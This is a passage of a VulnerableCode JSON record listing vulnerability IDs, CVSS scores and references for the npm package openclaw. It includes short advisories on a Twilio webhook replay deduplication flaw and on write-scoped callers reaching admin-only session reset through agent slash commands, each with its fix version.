2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sd
dn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xn
vm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["CVE-2026-32979","GHSA-xf99-j42q-5w5p"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-aawy-8xg4-1uen"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91667?format=json","vulnerability_id":"VCID-ad1h-m5fz-f3hu","summary":"Duplicate Advisory: OpenClaw's voice-call Twilio webhook replay could bypass manager dedupe because normalized event IDs were randomized per parse\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-vqx8-9xxw-f2m7. 
This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.23 contain a vulnerability in Twilio webhook event deduplication where normalized event IDs are randomized per parse, allowing replay events to bypass manager dedupe checks. Attackers can replay Twilio webhook events to trigger duplicate or stale call-state transitions, potentially causing incorrect call handling and state corruption.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/1d28da55a5d0ff409e34999e0961157e9db0a2ab","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/1d28da55a5d0ff409e34999e0961157e9db0a2ab"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-twilio-webhook-replay-bypass-via-randomized-event-id-normalization","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-twilio-webhook-replay-bypass-via-randomized-event-id-normalization"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32053","reference_id":"CVE-2026-32053","reference_type":"","scores"
:[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32053"},{"reference_url":"https://github.com/advisories/GHSA-3r78-rqg8-95gg","reference_id":"GHSA-3r78-rqg8-95gg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3r78-rqg8-95gg"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vqx8-9xxw-f2m7","reference_id":"GHSA-vqx8-9xxw-f2m7","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vqx8-9xxw-f2m7"}],"fixed_packages":[],"aliases":["GHSA-3r78-rqg8-95gg"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ad1h-m5fz-f3hu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91683?format=json","vulnerability_id":"VCID-afkf-r949-dkgu","summary":"OpenClaw: Write-scoped callers could reach admin-only session reset logic through `agent`\n## Summary\nIn affected versions of `openclaw`, a gateway caller with `operator.write` could issue `agent` requests containing `/new` or 
`/reset` and reach the same reset path used by the admin-only `sessions.reset` RPC.\n\n## Impact\nOn gateways where a caller is intentionally granted `operator.write` but not `operator.admin`, that caller could reset targeted conversation state through `agent` slash commands. This crosses the documented method-scope boundary between write-scoped messaging and admin-only session mutation.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.3.8`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nScope checks were enforced only on the outer RPC method. The `agent` slash-command path reused admin-only reset logic internally, so a write-scoped caller could reach session-reset mutation without holding `operator.admin`.\n\n## Fix\nOpenClaw no longer routes conversation `/new` and `/reset` through the admin-only `sessions.reset` entry point. Reset logic now lives in a shared service, while `sessions.reset` remains admin-only. The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or 
later.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jf6w-m8jw-jfxc","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jf6w-m8jw-jfxc"},{"reference_url":"https://github.com/advisories/GHSA-jf6w-m8jw-jfxc","reference_id":"GHSA-jf6w-m8jw-jfxc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jf6w-m8jw-jfxc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-m
bty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-4
69t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-s
xfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-z
jv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3
yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-u
a7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-jf6w-m8jw-jfxc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-afkf-r949-dkgu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91439?format=json","vulnerability_id":"VCID-aja9-wzp2-kbcj","summary":"OpenClaw: Google Chat app-url webhook auth accepted non-deployment add-on principals\n## Summary\nGoogle Chat app-url webhook verification accepted add-on principals outside the intended deployment binding.\n\n## Affected Packages / Versions\n- Package: 
